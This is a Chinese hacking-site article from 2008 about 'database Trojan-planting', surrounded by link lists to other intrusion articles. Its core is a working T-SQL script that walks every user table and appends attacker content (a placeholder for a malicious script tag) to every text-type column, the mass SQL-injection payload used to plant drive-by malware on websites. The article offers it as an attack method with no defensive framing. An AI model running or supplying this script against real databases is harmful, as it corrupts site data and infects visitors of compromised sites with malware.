·	最近比较流行的数据库挂	04-28	·	攻击木马–远程控制软件	04-28
·	仿SQLTOOLS 写的一个工具	04-28	·	输入小助手.vbs	04-28
·	logtamper-v1.0 修改lin	04-28	·	nasl插件生成器（带源码	04-28
·	OBlog 的SQL注入漏洞检测	04-28	·	经典Windows XP系统故障	04-28
·	全民红客 CNN攻击技术解	04-28	·	megalogs提供300MB免费p	04-28
·	Windows Vista虚拟化功能	04-27	·	硬盘故障排除大全	04-27
·	Vista SP1开机黑屏闪烁解	04-27	·	教你进入有密码 Windows	04-27
·	myhosting247.com提供50	04-27	·	玩转Windows Vista关机功	04-26
·	Win XP系统任务栏优化等	04-26	·	香港新浪提供免费主页空	04-26
·	Windows XP用户：教你超	04-25	·	我要发搜免费为电影站提	04-25
·	巧招为Vista系统上网冲浪	04-24	·	门户通提供2G免费全能空	04-24
·	Vista下网络共享麻烦不断	04-23	·	菜鸟到高手系统自身挖掘	04-23
·	奏响曲奏响在Vista下网	04-23	·	与众不同windows Vista下	04-23
·	全面出击让Vista网络安	04-23	·	随意换 Vista启动和登陆	04-23

[推荐]最近比较流行的数据库挂马

荐 ★★★★★

最近比较流行的数据库挂马

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-4-28 11:03:02

以前说过的趋势挂马事件，MS这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。

SQL语句如下：

用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）

xtype=99 ntext

xtype=35 text

xtype=231 nvarchar

xtype=167 varchar

———————YD的分割——————————–

DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

———————YD的分割——————————–

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：攻击木马–远程控制软件自身的漏洞新解

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

完全解析网页后门和挂马	04-02
真实的网络攻击取证纪实	03-27
利用404错误页面挂马	03-21
解密风暴	03-21
社会工程学在黑客中的应用	01-02
轻轻松松解密各种网页木马	12-21
SA权限无xp_cmdshell时取权限又一	12-14
实现无net.exe和net1.exe添加系统	10-26
用U盘轻松去除XP管理员密码	10-26
教你多种保护措施限用移动硬盘	10-09
bat 延时执行命令	10-09
phpwind的一个放后门的方式	10-09